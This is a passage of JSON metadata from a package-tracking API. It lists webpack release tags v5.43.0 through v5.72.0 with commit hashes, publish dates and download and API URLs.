ha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/